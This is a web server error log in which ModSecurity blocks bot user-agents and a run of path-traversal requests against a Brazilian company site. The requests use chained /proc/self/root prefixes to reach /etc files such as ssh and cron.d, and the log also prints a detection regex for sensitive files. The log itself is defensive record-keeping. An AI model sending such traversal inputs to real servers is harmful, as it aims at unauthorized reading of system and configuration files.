[Mon Mar 16 11:21:15.180428 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.228.16:47304] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgR2XjZBu2q05ozVU9N9wAAAUQ"]
[Mon Mar 16 11:23:39.142029 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.244.31:55968] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgSa_9ocpUE4ed4uDzl2QAAAhI"]
[Mon Mar 16 11:24:03.685555 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.241.46:60034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgSg3jZBu2q05ozVU9OTgAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:24:04.961909 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.241.46:36754] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgShAlT9VtDQc7bgUymOAAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:24:06.143881 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:36764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgShrysWC90G-1nBrA81QAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:24:07.394721 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.241.46:36780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgSh3bQATo66fKoS7xF-gAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:24:16.411149 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.241.46:33652] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgSkHjZBu2q05ozVU9OVgAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:24:53.655199 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:33656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgStbABkC4fWIHEf8HjSQAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:26:16.149584 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.228.16:41384] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgTCHjZBu2q05ozVU9OZQAAAUE"]
[Mon Mar 16 11:27:29.168052 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.241.46:34702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTUQlT9VtDQc7bgUymjgAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:30.498827 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:45710] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTUo6lpbStxTqkSktlaQAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:31.640695 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:45720] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTU_9ocpUE4ed4uDznHgAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:32.917080 2026] [:error] [pid 11972:tid 140411574073088] [client 74.7.241.46:45722] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTVJqj1wV0Si-Okefj1gAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:34.206098 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.241.46:45730] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTVnbQATo66fKoS7xGHgAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:35.308723 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:45742] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTV46lpbStxTqkSktlagAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:36.523242 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.241.46:45750] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTWNSswJuvopo3lOhX6QAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:37.834454 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:45754] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTWbABkC4fWIHEf8HjWAAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:39.147411 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.241.46:37276] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTWwlT9VtDQc7bgUymmAAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:40.300344 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.241.46:37280] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTXJqj1wV0Si-Okefj2QAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:41.650067 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.241.46:37288] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTXQlT9VtDQc7bgUymmwAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:42.841871 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:37300] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTXpqj1wV0Si-Okefj2wAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:43.115704 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.241.46:37300] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTX5qj1wV0Si-Okefj3QAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:44.427854 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.241.46:37308] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTYP9ocpUE4ed4uDznKwAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:50.181406 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.241.46:37318] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTZpqj1wV0Si-Okefj4gAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:27:51.413279 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.241.46:57356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTZwlT9VtDQc7bgUympwAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
